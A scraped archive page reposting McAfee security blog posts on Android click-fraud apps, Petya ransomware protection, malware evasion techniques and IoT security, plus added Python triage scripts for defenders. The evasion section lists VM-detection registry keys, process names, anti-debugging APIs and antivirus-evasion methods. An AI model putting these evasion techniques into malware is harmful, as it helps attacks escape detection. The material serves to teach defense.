Category Archives: McAfee ePO antivirus

Android Click-Fraud Apps Briefly Return to Google Play

Tags : McAfee.com/activate , Install McAfee , McAfee Internet Security , McAfee Total Protection , McAfee Antivirus , McAfee Smart Phone Security and McAfee Identity Protection.

Click-fraud apps frequently appear on Google Play and third-party markets. They are sometimes hard to identify because the malicious behavior that simulates clicks is similar to the behavior of many legitimate applications (using common API calls and permissions). Further, part of the malicious code does not reside in the original malware and comes from a control server. Using special methods to perform the clicking allows the attackers to decide when and how to pursue their fraud.

The McAfee Mobile Malware Research Team recently found on Google Play a group of Android/Clickers published by the developer “TubeMate 2.2.9 SnapTube YouTube Downloader J.” Five apps were updated on Google Play on August 4 and were removed a few days later, along with the developer profile.

By checking “com.ggnegmth.app” on Google Play we saw something suspicious about this application: a nonsense name, no description, and poor reviews. Of course, those traits do not guarantee an app is malicious, but this combination should serve as a warning for Android users looking for new apps.

 

Analyzing and reverse engineering this sample shows us a DeviceAdminReceiver class that connects to a hardcoded URL to obtain parameters that indicate how and where to perform click-fraud activities:

This function is part of a service initiated by a receiver related to DeviceAdmin.

Once the URL is requested, the control server returns an HTML page with the parameters in an uncommon way—inside the title tag, as we see in the following:

All the parameters are in one line, but the malware interprets them using the string “eindoejy” to separate them, obtaining the target URL, JavaScript functions to perform clicks, HTTP headers used in the fraudulent HTTP request, and another Google Play package to monetize the clicks in the abused ad network. We thought that string “eindoejy” could be an anagram of “I enjoyed” or “die enjoy,” but we found other variants in which the word used to split the parameters is different.
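The parameter line described above can be pulled apart with a small analyst script. The following is an added example written for this page, not code from McAfee or from the malware: it extracts the `<title>` text, splits it on the delimiter word, and guesses what each field is from its shape rather than assuming a fixed order (the post does not state one). The control-server response it parses is constructed, and the `KNOWN_DELIMITERS` list and the field-classification heuristics are assumptions meant to be extended as new variants appear.

```python
"""Added example: parse the click-fraud parameter line that Android/Clicker.BN
receives inside an HTML <title> tag. Analyst tooling written for this page; the
sample response and the field heuristics are constructed assumptions."""
import re
from html.parser import HTMLParser

# Delimiter named in the post; other variants use a different word, so keep a list.
KNOWN_DELIMITERS = ["eindoejy"]


class _TitleGrabber(HTMLParser):
    """Collect the text inside the first <title> element."""

    def __init__(self):
        super().__init__()
        self._in_title = False
        self.title = ""

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def extract_title(page: str) -> str:
    parser = _TitleGrabber()
    parser.feed(page)
    parser.close()
    return parser.title.strip()


def classify_field(field: str) -> str:
    """Guess a field's role from its shape. JavaScript is tested before headers
    because a 'javascript:' prefix would otherwise look like a header line."""
    if re.match(r"^https?://", field):
        return "target_url"
    if re.search(r"\bfunction\b|document\.|\.click\(\)", field):
        return "click_js"
    if re.match(r"^[a-z][a-z0-9_]*(\.[a-z][a-z0-9_]*)+$", field):
        return "play_package"
    if re.match(r"^[A-Za-z-]+:\s*\S", field):
        return "http_header"
    return "unknown"


def parse_clicker_config(page: str, delimiters=KNOWN_DELIMITERS):
    """Return the delimiter and the classified fields, or None when the title
    carries no config of this shape."""
    title = extract_title(page)
    for delim in delimiters:
        if delim in title:
            fields = [f.strip() for f in title.split(delim) if f.strip()]
            return {"delimiter": delim,
                    "fields": [(classify_field(f), f) for f in fields]}
    return None


# Constructed control-server response (not a captured one): every parameter on
# one line inside the title, separated by the delimiter word.
SAMPLE_RESPONSE = (
    "<html><head><title>"
    "http://ads.example.test/landing?id=42eindoejy"
    "document.getElementsByTagName('a')[0].click()eindoejy"
    "User-Agent: Mozilla/5.0 (Linux; Android 7.0)eindoejy"
    "com.example.sponsoredapp"
    "</title></head><body></body></html>"
)

if __name__ == "__main__":
    for kind, value in parse_clicker_config(SAMPLE_RESPONSE)["fields"]:
        print(f"{kind:13} {value}")
```

Because the fields are classified by shape, the same parser keeps working when a variant reorders them or changes the delimiter; only `KNOWN_DELIMITERS` needs the new word. A response whose title splits into nothing recognizable returns `None`, which is the right answer for an ordinary web page.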

Once installed, Android/Clicker.BN adds an icon to the main menu that is not related to the app downloaded from Google Play. The new icon appears to be a system utility. Some examples of the icons loaded by the malware:

When Android/Clicker.BN executes, it requests device administration privileges:

Some of the apps can access YouTube inside a WebView and list trending channels, others lock and blacken the screen, and others crash the UI while in the background running click fraud—which not only harms advertisers and publishers, but also generates malicious traffic on infected devices, impacts battery and overall usage performance, and opens the door to new malicious payloads.

McAfee Mobile Security detects this threat as Android/Clicker.BN!Gen and prevents its execution. To further protect yourself against malicious apps, use only legitimate app stores, and pay attention to suspicious traits such as nonsense names, missing descriptions, and poor reviews. Also verify that the app’s requests for permissions are related to its functionality. Be wary when apps request device administration API access, which is usually requested only by security apps, antimalware, mobile device management, or corporate email clients. Most apps and games will never ask for device admin rights.
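The device-admin warning sign above can be checked before an app is installed by looking at its decoded `AndroidManifest.xml`. The following is an added example written for this page, not McAfee code: it finds receivers that declare the real Android device-admin permission (`android.permission.BIND_DEVICE_ADMIN`) or handle the `android.app.action.DEVICE_ADMIN_ENABLED` broadcast, and flags them when the app's stated purpose is not one the post names as a normal user of device admin. The manifest and the package name are constructed placeholders.

```python
"""Added example: triage a decoded AndroidManifest.xml for device-admin use,
the warning sign the post calls out. Written for this page, not McAfee code;
the manifest below is constructed and its package name is a placeholder."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# Real Android identifiers: the permission a DeviceAdminReceiver must be
# guarded by, and the broadcast it must handle.
DEVICE_ADMIN_PERMISSION = "android.permission.BIND_DEVICE_ADMIN"
DEVICE_ADMIN_ACTION = "android.app.action.DEVICE_ADMIN_ENABLED"

# App categories for which device admin is ordinarily expected (from the post).
# The labels themselves are an assumption of this example.
DEVICE_ADMIN_EXPECTED = {"security", "antimalware", "mdm", "corporate-email"}


def find_device_admin_receivers(manifest_xml: str) -> list:
    """Names of <receiver> elements that are wired up as device admins."""
    root = ET.fromstring(manifest_xml)
    hits = []
    for receiver in root.iter("receiver"):
        perm = receiver.get(ANDROID_NS + "permission", "")
        actions = {a.get(ANDROID_NS + "name") for a in receiver.iter("action")}
        if perm == DEVICE_ADMIN_PERMISSION or DEVICE_ADMIN_ACTION in actions:
            hits.append(receiver.get(ANDROID_NS + "name", "<unnamed>"))
    return hits


def device_admin_verdict(manifest_xml: str, app_category: str) -> str:
    """Combine the manifest finding with what the app claims to be."""
    receivers = find_device_admin_receivers(manifest_xml)
    if not receivers:
        return "no device admin"
    if app_category in DEVICE_ADMIN_EXPECTED:
        return "device admin, plausible for category"
    return "device admin, unexpected for category: review " + ", ".join(receivers)


# Constructed manifest: a "video downloader" that quietly registers a device
# admin receiver next to an ordinary boot receiver.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.placeholder.downloader">
  <application android:label="Video Downloader">
    <receiver android:name="com.example.placeholder.downloader.AdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <meta-data android:name="android.app.device_admin"
                 android:resource="@xml/device_admin" />
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
      </intent-filter>
    </receiver>
    <receiver android:name="com.example.placeholder.downloader.BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED" />
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

if __name__ == "__main__":
    print(device_admin_verdict(SAMPLE_MANIFEST, "video-downloader"))
```

The check deliberately looks at both the permission attribute and the intent action: a receiver that declares either one is a device admin component, even if the other is missing or mistyped.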

Source : securingtomorrow.mcafee.com

McAfee.com/activate : Blog

How to Protect Against Petya Ransomware in a McAfee Environment


A new variant of the ransomware Petya (also called Petrwrap) began spreading around the world on June 27. Petya is ransomware that exploits the vulnerability CVE-2017-0144 in Microsoft’s implementation of the Server Message Block protocol. This ransomware encrypts the master boot records of infected Windows computers, making the machines unusable.

The initial attack vector is unclear, but aggressive worm-like behavior helps spread the ransomware. (Read McAfee’s detailed technical analysis of the Petya ransomware.)

Microsoft released a set of critical patches on March 14 to remove the underlying vulnerability in supported versions of Windows, but many organizations may not yet have applied these patches.

How McAfee products can protect against Petya ransomware

As with WannaCry and other similar attacks, a layered, integrated cyber defense system that combines advanced analytics, threat intelligence, signatures, and human expertise is the best way to protect your business against emerging threats. McAfee’s collaborative cyber defense system leads the way for enterprises to protect against emerging threats such as Petya ransomware, remediate complex security issues, and enable business resilience. By empowering integrated security platforms with advanced malware analytics and threat intelligence, our system provides adaptable and continuous protection as a part of the threat defense life cycle.

Attacks like Petya and its future variants cannot win against a collaborative cybersecurity ecosystem that works as a team and empowers protective tools to make better decisions at the point of attack.

McAfee offers early protection for components of the initial Petya attack in the form of advanced malware behavior analysis with Real Protect Cloud and the brand-new Dynamic Neural Network (DNN) analysis techniques available in McAfee Advanced Threat Defense (ATD). ATD 4.0 introduced a new detection capability using a multilayered, back-propagation neural network (DNN) leveraging semisupervised learning. DNN looks at certain features exhibited by a sample to arrive at a positive or negative verdict on whether the code is malicious.

Whether in standalone mode or connected to McAfee endpoint or network sensors, ATD combines threat intelligence with sandbox behavior analysis and advanced machine learning to provide zero-day, adaptable protection. Real Protect, part of the Dynamic Endpoint solution, also uses machine learning and link analysis to protect against malware without signatures and provide rich intelligence to the Dynamic Endpoint and the rest of the McAfee ecosystem. Real Protect combined with Dynamic Application Containment provided early protection against Petya.

Multiple McAfee products provide additional protection to either contain the attack or prevent further execution. This post provides an overview of those protections with the following products:

McAfee Endpoint Security

Threat Prevention

  • McAfee Endpoint Security (ENS) with Global Threat Intelligence (GTI) and On Access Scan policy with the sensitivity level set to “Low” protect against known samples and variants. Learn more about recommended McAfee GTI file reputation settings in KB74983, with more information in KB53735.
  • McAfee Threat Intelligence Exchange (TIE) with GTI protect against known samples and variants.

Thus systems using McAfee ENS 10 are protected from known samples and variants with both signatures and Threat Intelligence.

Adaptive Threat Protection

  • Adaptive Threat Protection (ATP), with rule assignment configured in “Balanced mode” (the default in the ATP\Options\Rule Assignment setting), will protect against both known and unknown variants of the Petya ransomware.
  • The ATP module protects against this unknown threat with several layers of advanced protection and containment:
    • ATP Real Protect Static uses client-side pre-execution behavioral analysis to monitor unknown malicious threats before they launch.
    • ATP Real Protect Cloud uses cloud-assisted machine learning to identify and clean the threat, as shown below:

  • ATP Dynamic Application Containment (DAC) successfully contains the threat and prevents any potential damage from occurring (DAC events noted below):

Advanced Threat Defense

  • McAfee Advanced Threat Defense (ATD) 4.0 with Deep Neural Network and Dynamic Sandbox identified the threat and proactively updated the cyber defense ecosystem.

Source : securingtomorrow.mcafee.com


An Overview of Malware Self-Defense and Protection


Many malware authors spend a great deal of time and effort to develop complex code. Their success depends on a threat’s remaining undetected and avoiding sandbox analysis, antivirus efforts, or malware analysts. This post offers an overview of the mechanisms used by malware to evade detection.

If malware is detected quickly, it has little time to steal data or to maximize its impact. The IT security market has matured and security tools and applications are today more efficient. However, attackers understand and monitor the operations of security tools. In addition, organizations do not always follow best practices. Antimalware tools are sometimes outdated, and sandboxes can easily be detected due to misconfiguration.

Malware self-defense

Malware can use several mechanisms to avoid detection and analysis. We can classify these techniques into three categories:

  • Anti-security tools: Used to avoid detection by antivirus, firewall, and other tools that protect the environment.
  • Anti-sandbox: Used to detect automatic analysis and avoid engines that report on the behavior of malware.
  • Anti-analyst: Used to detect and fool malware analysts; for example, by spotting monitoring tools such as Process Explorer or Wireshark, or by using process-monitoring tricks or packers to hinder reverse engineering.

Some malware techniques are common to these three categories. Malware can use a technique like RunPE (which runs another instance of itself in memory) to evade antivirus software, a sandbox, or an analyst.

Sandbox evasion

Sandboxes are an effective tool to quickly detect and understand malware; however, it is relatively trivial for malware to detect a sandbox if it is not hardened. Malware can perform several basic checks:

  • MAC address detection: Virtual environments such as VMware or VirtualBox use known MAC addresses. This address is often stored in the registry at (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0000\NetworkAddress). The malware can detect this in two ways: by reading the registry key or by using the GetAdaptersInfo API.
    DWORD GetAdaptersInfo(
              _Out_   PIP_ADAPTER_INFO pAdapterInfo,
              _Inout_ PULONG                   pOutBufLen
    );
  • Process discovery: Malware may be able to detect whether there are any running processes related to a sandbox. For example, processes such as VmwareService.exe can be easily detected with the CreateToolhelp32Snapshot API, which takes a snapshot of the currently running processes, and then by listing each process in the snapshot with the Process32First and Process32Next APIs.
    HANDLE WINAPI CreateToolhelp32Snapshot(  
              _In_ DWORD dwFlags,  
              _In_ DWORD th32ProcessID
    );
    
    BOOL WINAPI Process32First(  
              _In_    HANDLE           hSnapshot,  
              _Inout_ LPPROCESSENTRY32 lppe
    );
    
    BOOL WINAPI Process32Next(  
              _In_  HANDLE           hSnapshot,  
              _Out_ LPPROCESSENTRY32 lppe
    );
  • Registry detection: Virtual environments create registry keys on the system that can be detected by malware. The following is an incomplete list of the registry keys that malware can check:
    “HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0”
    “SOFTWARE\\VMware, Inc.\\VMware Tools”
    “HARDWARE\\Description\\System”
    “SOFTWARE\\Oracle\\VirtualBox Guest Additions”
    “SYSTEM\\ControlSet001\\Services\\Disk\\Enum”
    “HARDWARE\\ACPI\\DSDT\\VBOX__”
    “HARDWARE\\ACPI\\FADT\\VBOX__”
    “HARDWARE\\ACPI\\RSDT\\VBOX__”
    “SYSTEM\\ControlSet001\\Services\\VBoxGuest”
    “SYSTEM\\ControlSet001\\Services\\VBoxMouse”
    “SYSTEM\\ControlSet001\\Services\\VBoxService”
    “SYSTEM\\ControlSet001\\Services\\VBoxSF”
    “SYSTEM\\ControlSet001\\Services\\VBoxVideo”

Malware can also perform some advanced techniques to detect a sandbox:

  • Checking for hooked functions: A hook is a technique to alter the behavior of an internal function of an operating system or an application. Sandboxes use hooks to observe and alter the behavior of a sample; for example, by hooking the DeleteFile function, the sandbox intercepts the malware’s attempt to delete a file. These kinds of functions are located in a specific place in memory (kernel land).

Malware can detect a hook by checking the address of the calling function: for example, if the return address is not located in the kernel, the function is currently hooked.

Malware can use other techniques such as checking the size of the hard drive or using special instructions to read specific registers (the “Red Pill” and “No Pill” techniques). These techniques rely on the fact that such registers are unique to a machine and have to be relocated in a virtual environment.

Antivirus evasion

Antivirus tools rely on three basic functions: signatures, a scanner, and heuristics.

  • Evading signatures can be performed by changing the hash of the sample, which is as easy as changing only one byte in the executable.
  • Evading a scanner can be performed by creating a big file to confuse the emulator.
  • Evading heuristic analysis is more complex, but can be performed by hooking back functions.

Another way to evade antivirus tools is for the malware to disable the tool or add an exception. Polymorphic codes are particularly difficult to detect.

Antidebugging

Malware analysts often have to dig deep during code analysis. Antidebugging is another malware technique for avoiding reverse engineering by a debugger. It is relatively trivial to detect the presence of a debugger using the Windows API.

  • IsDebuggerPresent: This function checks a specific flag in the process environment block, the IsDebugged field, and returns zero if the process is not running under a debugger or nonzero if a debugger is attached.
    BOOL WINAPI IsDebuggerPresent(void);
  • FindWindow: This function can search for windows by name or class (for example, OllyDbg). This function can also detect tools such as Wireshark or Process Explorer.
    HWND WINAPI FindWindow(  
              _In_opt_ LPCTSTR lpClassName,  
              _In_opt_ LPCTSTR lpWindowName
    );
  • CsrGetProcessId: This function can find the process ID of csrss.exe, a system process. By default, a process has the SeDebugPrivilege privilege in the access token disabled. However, when the process is loaded by a debugger such as OllyDbg or WinDbg, the SeDebugPrivilege privilege is enabled. If a process can open csrss.exe, it means that the process has the privilege SeDebugPrivilege enabled in the access token, thus suggesting that the process is being debugged.
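The registry keys, process names and API names listed in the sandbox-evasion and anti-debugging sections above are exactly the strings a triage scanner can look for in a sample before it is ever executed. The following is an added example written for this page, not McAfee code: it searches a file's raw bytes for those indicators in both ASCII and UTF-16LE (Windows binaries carry strings in either form) and reports which evasion categories they hint at. The byte blob it scans is constructed, not a real sample, and the category names are this example's own. A hit is a reason to look closer, not a verdict: imports such as FindWindow are common in legitimate software, so the count of distinct categories matters more than any single match.

```python
"""Added example: static triage of a binary for the sandbox-detection and
anti-debugging indicators listed above. Defender tooling written for this page,
not McAfee code; the byte blob at the bottom is constructed, not a real sample."""
from collections import defaultdict

# Indicator strings from the post, grouped by the evasion category they hint at.
# Registry paths use single backslashes, as they appear in memory.
INDICATORS = {
    "vm-registry": [
        r"SOFTWARE\VMware, Inc.\VMware Tools",
        r"SOFTWARE\Oracle\VirtualBox Guest Additions",
        r"HARDWARE\ACPI\DSDT\VBOX__",
        r"HARDWARE\ACPI\FADT\VBOX__",
        r"HARDWARE\ACPI\RSDT\VBOX__",
        r"SYSTEM\ControlSet001\Services\VBoxGuest",
        r"SYSTEM\ControlSet001\Services\VBoxService",
        r"SYSTEM\ControlSet001\Services\VBoxSF",
    ],
    "vm-mac-address": ["NetworkAddress", "GetAdaptersInfo"],
    "vm-process-discovery": [
        "VmwareService.exe", "CreateToolhelp32Snapshot",
        "Process32First", "Process32Next",
    ],
    "anti-debug": ["IsDebuggerPresent", "FindWindow", "CsrGetProcessId", "OllyDbg"],
}


def _encodings(text: str):
    """Windows binaries store strings as ASCII or UTF-16LE; check both."""
    return text.encode("ascii"), text.encode("utf-16-le")


def scan_bytes(data: bytes) -> dict:
    """Return {category: [matched indicators]} for every indicator found.
    Substring matching means 'Process32First' also catches 'Process32FirstW'."""
    hits = defaultdict(list)
    for category, needles in INDICATORS.items():
        for needle in needles:
            if any(enc in data for enc in _encodings(needle)):
                hits[category].append(needle)
    return dict(hits)


def scan_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return scan_bytes(fh.read())


def evasion_summary(hits: dict) -> str:
    """One-line verdict: how many distinct evasion categories were hinted at."""
    if not hits:
        return "no evasion indicators"
    return f"{len(hits)} evasion categories: " + ", ".join(sorted(hits))


# Constructed blob standing in for a PE image: an MZ header, filler, a few
# ASCII import names, one UTF-16LE registry path and a VM process name.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 32
    + b"IsDebuggerPresent\x00CreateToolhelp32Snapshot\x00Process32Next\x00"
    + "SOFTWARE\\Oracle\\VirtualBox Guest Additions".encode("utf-16-le") + b"\x00\x00"
    + b"VmwareService.exe\x00"
    + b"\x00" * 16
)

if __name__ == "__main__":
    found = scan_bytes(SAMPLE_BLOB)
    print(evasion_summary(found))
    for category, names in found.items():
        print(f"  {category}: {', '.join(names)}")
```

Run against a real file with `scan_file("sample.bin")`. Packed or encrypted samples will hide these strings until they are unpacked, which is itself one of the evasion categories the post lists, so an empty result on a packed binary is not a clean bill of health.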

Anti-Disassembly

Anti-disassembly is another technique to avoid analysis through reverse engineering. There are many ways to hinder a disassembler:

  • API obfuscation can hide a call to a special function. The result could be a call without the name of the API function, for example. The analyst has to reverse it to understand which function was used. This takes time.
  • Inserting junk code: Junk code can be inserted into the malware to fool analysts into wasting time trying to reverse unusable code. The junk code does not change the behavior of the sample because this code is never executed.

The “Unprotect Project”

There are many ways to avoid malware analysis. Some open projects list these techniques. The Unprotect Project is an open wiki that collects and lists malware protection and self-defense techniques. The project includes a mind map that lists techniques for a better understanding of malware protection capabilities.

The goal of this project is to help the community better understand techniques used by malware to stay undetected, bypass security protection, and avoid analysis. The following categories appear on the website:

  • Sandbox evasion techniques: To evade sandboxes analysis.
  • Antivirus evasion techniques: To evade detection by antivirus.
  • Anti-debugging techniques: To fool debuggers and avoid analysis.
  • Anti-disassembly: To prevent reverse engineering and understanding of malware behavior with a disassembler.
  • Process tricks: To hide the malware processes on the system and stay undetected.
  • Obfuscation and data encoding: To hide data or part of code in the malware.
  • Packers: To protect malware code and add other evasion capabilities.

The wiki is updated continuously.

Conclusion

Malware is constantly growing smarter and evolving techniques to stay undetected. Understanding these techniques and sharing the experiences of the information security community are effective ways to fight malware.

Source : securingtomorrow.mcafee.com


McAfee Customer Success Group Puts Customers at the Core


To Our Valued Customers:

Allow me to introduce myself. I am Aneel Jaeel, the new leader of the McAfee Customer Success Group. With 25 years of industry experience, I’m excited about applying what I’ve learned to help transform our organization to bring you the best possible customer experience. I’d like to share our vision of customer success, which includes a new approach and a new flagship offering.

When it comes to protecting against breaches and other advanced threats, companies are facing big challenges—enterprise environments are more complex than ever before, the volume and sophistication of attacks is increasing at a rapid pace, and skilled staff are in short supply. There’s never enough time to keep up with new outbreaks, updates, and technology trends. With 1.8 million cybersecurity jobs going unfilled in 2017, building a top-notch team has never been more difficult. And threats are evolving rapidly, which means we need to proactively evolve our defenses.

As part of our transformation as a company, we pledge to dedicate ourselves to keeping the world safe from cyberthreats and to be your number one security partner. Our new Customer Success Group has aligned itself with that mission. We aim to put you, our customer, at the core to ensure that you get your desired outcomes from your McAfee solutions. With that goal always at the forefront, we are now providing holistic solutions that align Education Services, Professional Services, and Enterprise Support teams to help you achieve and maintain success throughout your entire threat defense lifecycle with us.

At MPOWER, we’ll be launching a new integrated offering—our flagship McAfee Premier Success Plan. We understand that acquiring the right solution is just the beginning. Equally important to a sound security strategy are decisions around design, deployment, maintenance, risk management, escalations, and education. Drawing from key services across our organization, we’ve created a simplified, all-in-one program focused on three outcomes. Through the McAfee Premier Success Plan, we’ll collaborate with you to more proactively plan and maintain your McAfee solutions, manage operational risk, and derive the full value of your security investment over time. Our comprehensive roadmap integrates professional services and solutions services, training, and technical support with personalized management.

We at the McAfee Customer Success Group believe in the principle that “Together is power.” When it comes to achieving digital safety and success, you are not alone.

Source : securingtomorrow.mcafee.com


‘McAfee Labs Threats Report’ Explores Malware Evasion Techniques, Digital Steganography, Password-Stealer Fareit


We got a little carried away in the McAfee Labs Threats Report: June 2017, published today. This quarter’s report has expanded to a rather hefty 83 pages! It contains three highly educational topics, in addition to the usual set of threats statistics:

  • We broadly examine evasion techniques and how malware authors use them to accomplish their goals. We discuss the more than 30-year history of evasion by malware, the underground market for off-the-shelf evasion technology, how several contemporary malware families leverage evasion techniques, and what to expect in the future, including machine-learning and hardware-based evasion.
  • We explore the very interesting topic of steganography in the digital world. Digital steganography hides information in benign-looking objects such as images, audio tracks, video clips, or text files. Of course, attackers use these techniques to move information past security systems. We explain how that happens in this key topic.
  • We deconstruct Fareit, the most famous password-stealing malware. We cover its origins, typical infection vectors, architecture and inner workings, how it has changed over the years, and how it was likely used in the breach of the Democratic National Committee before the 2016 U.S. Presidential election. Coincidentally, DocuSign reported that on May 15, customer email addresses were stolen and then used in a phishing campaign. Victims who clicked on the phishing links were infected with malware, one of which was Fareit. Read our technical analysis of the DocuSign attack.

Accompanying each of these key topics is a Solution Brief that goes into detail about how McAfee products can protect against these threats.

Here are some highlights from our extensive analysis of threats activity in Q1:

  • Malware: New malware samples rebounded in Q1 to 32 million. The total number of malware samples increased 22% in the past four quarters to 670 million samples.
  • Ransomware: New ransomware samples rebounded in Q1 primarily due to Congur ransomware attacks on Android OS devices. The number of total ransomware samples grew 59% in the past four quarters to 9.6 million samples. (We will discuss the WannaCry ransomware in our next quarterly report.)
  • Mobile malware: Reports from Asia doubled in Q1, contributing to a 57% increase in global infection rates. Total mobile malware grew 79% in the past four quarters to 16.7 million samples.
  • Incidents: We counted 301 publicly disclosed security incidents in Q1, an increase of 53% over Q4. The health, public, and education sectors comprised more than 50% of the total. 78% of all publicly disclosed security incidents in Q1 took place in the Americas.

Source : securingtomorrow.mcafee.com


How to Secure the Future of the Internet of Things


The world of security for the Internet of Things just became more complex. IoT devices are no longer a potential threat to their owners; now they pose a significant threat to everything connected to the Internet.

The old IoT security problem

For the past year, the cybersecurity and IoT communities have been at odds regarding how to keep devices from harming their owners. Much of the focus has been on industrial controls and transportation equipment. Vulnerable industrial control devices could cause cascading effects at power stations, water distribution, chemical plants, heavy machinery, and other industrial facilities, posing a threat to workers or downstream users. There have been hacks, compromises, and stern warnings. Concerned governments are applying pressure and establishing requirements to protect services at a national level.

Vehicles, most notably airplanes and smart cars, have taken the bulk of the public’s attention. Hacks against Jeep, Tesla, and Volkswagen have shown how doors can be unlocked and total operating control commandeered, with steering, brakes, and acceleration taken over by an attacker. A car that is rendered unusable by its owner or made to crash and injure occupants is frightening but apparently trivial if you do not own that type of vehicle. The public appears to be entertained by these research exploits but not too concerned. The danger may seem beyond the everyday consumer and the effects are likely limited to only those who could afford such conveyances.

On the low-cost side, home appliances, wearables, toys, and drones are already a part of the everyday consumer world, but hacking a smart toaster or rice cooker seems harmless, beyond some burnt starch.

Eventually, we will face more risks than we can imagine. As IoT devices are woven into the fabric of people’s daily lives, we will be at risk of their misuse. In the future they will begin to control the stoplights on the way to work, the equipment in the emergency room, progressively more vehicles on the road and in the sky, and the distribution of necessities such as electricity, food, medicine, water, and communications. We will begin to understand how these little technical minions become critical to the smooth delivery of services in our future digital lives.

This is the space where thought-leading IoT manufacturers are working feverishly. The automobile industry in particular has been quick to invest in security to ensure their products do not cause accidents. Such work has begun, but it still has a long way to go in cars and across all the other billions of devices we will weave into our lives and businesses in the next few years.

The next generation of IoT devices is appearing and will work to help protect our property, monitor our health, automate our homes, keep our children safe, increase our communication, eliminate time-wasting chores, make us more efficient, and optimize our businesses. A great future to be sure, but it will need to be trustworthy and secure, as our reliance on the smallest elements will ultimately impact the biggest parts of our lives. These are all known and accepted security challenges in the world of IoT. This is not the end of the security story, only the beginning.


The new IoT security problem

We now face a new set of problems with IoT. Unlike the known challenges, in which IoT devices might impact local owners and bystanders, the new threat is a powerful weapon that can be pointed at anything connected to the Internet. Recent distributed denial of service (DDoS) attacks have been fueled by hacked IoT devices, called bots. DDoS attacks saturate Internet-connected devices and services to bring them down or make them unavailable. Such attacks have been around for years, and in fact were some of the first types of Internet attacks; but the scale is now changing the game at a pace not tenable for security workarounds.

The game has changed. These IoT DDoS attacks are typically run by “bot herders.” These herders compromise devices and install malware that allows them to be remotely controlled. By pointing hundreds or thousands of devices to flood a target with requests and data, they can overwhelm it to the point it can no longer maintain functions. There are several anti-DDoS services that offer protection for a price. But the scale of the new IoT-backed attacks, which are larger than anything ever seen, makes protection difficult and costly. Josh Shaul, Akamai’s vice president of web security, warned that if such an attack were sustained, it could cost the victim millions of dollars in cybersecurity services to stay online.

Traditionally, PCs were the prime targets to turn into bots, as many people did not bother with installing antimalware products. But over the last few years, PCs have become much better protected and thus difficult for bot herders to consistently control. The other problem is the shift to laptops. A bot is good only if it is online, can receive instructions from its master, and then continuously execute those orders. Laptops do not fit this model well, as they spend much of their time off, to save battery life.

What bot herders really want is a massive number of devices that are easy to hack, are ignored by their owners, and are constantly connected to the Internet. Recent attacks have proven IoT devices are the perfect solution for cybercriminals.

The rise of IoT is a dream come true for bot herders. Most IoT devices are not powerful enough to have any type of antimalware service. A majority of consumer products come with a default login and password that are published by the manufacturer and easily found on the web. Many stay continuously connected to the Internet and users rarely monitor or update these devices, especially consumers. The biggest factor is around scale. Unlike the hundreds or thousands of PCs that might be in a herd, IoT botnets can number in the hundreds of thousands!

With legions of exploitable devices, attackers are mustering massive DDoS armies and the results of IoT botnets are devastating.

How to secure the future of IoT

The problem is not just what to do now, with the current exploits, but also how to protect the future. Attackers are using the simplest path to take control: default passwords. But they will adapt as controls come into play. This is the pattern we have seen with many other attack vectors. It is a repeating cycle in which attackers follow the path of least resistance to achieve their objective. IoT devices are just too perfect for botnets for the attackers to easily give up. This is shaping up to be a long and drawn-out fight.


We must secure the future of IoT. This means blocking current exploits as well as interdicting the likely future maneuvers of attackers. This is what must be done to protect the life cycle of IoT devices, from inception to retirement.

  1. Designed and architected for security
    IoT manufacturers must take the time to embed security into the architecture, interfaces, and designs of their products. Basic security concepts and capabilities such as compartmentalization of data and code, communication between trusted parties, data protection both in use and at rest, and authentication of users should be established and tested. Products in the future will get more powerful, store more data, and possess more functionality. This means products should have the ability for security updates, feature locking, build validation, software vetting, and default configurations that follow industry best practices. It all starts with the manufacturer. Future proofing begins at the foundations. The hardware, firmware, operating systems, and software must be designed to go into a hostile environment and survive.
  2. Secure provisioning and configuration
    Most IoT devices require some kind of setup and provisioning upon installation. Device identity and authentication are a must, as part of this two-way process. Proper default configurations that adhere to best security practices are important and should be easy for users to understand. Rules should be in place that forbid default passwords, require patches and updates to be signed, require data to be encrypted, and allow only secure web connections. For enterprises, limiting network access, patching in a timely manner, and allowing only approved software to run will go a long way to keeping the devices secure. For gadgets that are capable, implementing security software such as antimalware, intrusion prevention systems, and even local firewalls will improve the device’s defense posture. Detection and telemetry should also be configured to detect when systems are under attack or are functioning in ways not intended by the organization. Policies must be established for privacy, data retention, remote access, key security, and revocation procedures.
  1. Proper administration and management
    For devices owned by consumers, it is imperative they alone maintain the final say in how the device is managed. Manufacturers and online service providers play a role in provisioning but the owner must retain ultimate control of what the device will do. Provisioning is different than administration. For example, during installation of home cameras it makes sense to connect to the manufacturer for the latest patches and maybe even setting up cloud storage. But you would not want your home cameras controlled by the manufacturer. They should not have the ability to operate them outside of buyer’s authority. Owners must retain the power to turn on or off their products and choose which online services they allow to connect. This requires proper user identification and authentication. As before, allowing a common default password is not good because anyone can take over as the administrator. Imagine if Windows came with a default login password for every system. It would create a security nightmare because many would never change it and attackers would login as users. So, first IoT systems must be able to authenticate their owners. Management functionality must also extend to empower the owner to set limits, data policies, and privacy parameters that are more restrictive than those of any potential third-party vendor. Signed security updates should be automatically installed by default as they become available. Savvy owners should be able to configure limits for inbound and outbound connections, data types, ports, and security settings. Logs that can be pushed to a trusted system or viewed locally should capture errors, and unexpected and unusual activities. A system for remote-warning notifications, via email or text, is a welcome feature on some devices. Finally, a reset capability must be present in the event of an unrecoverable compromise or transfer of ownership.
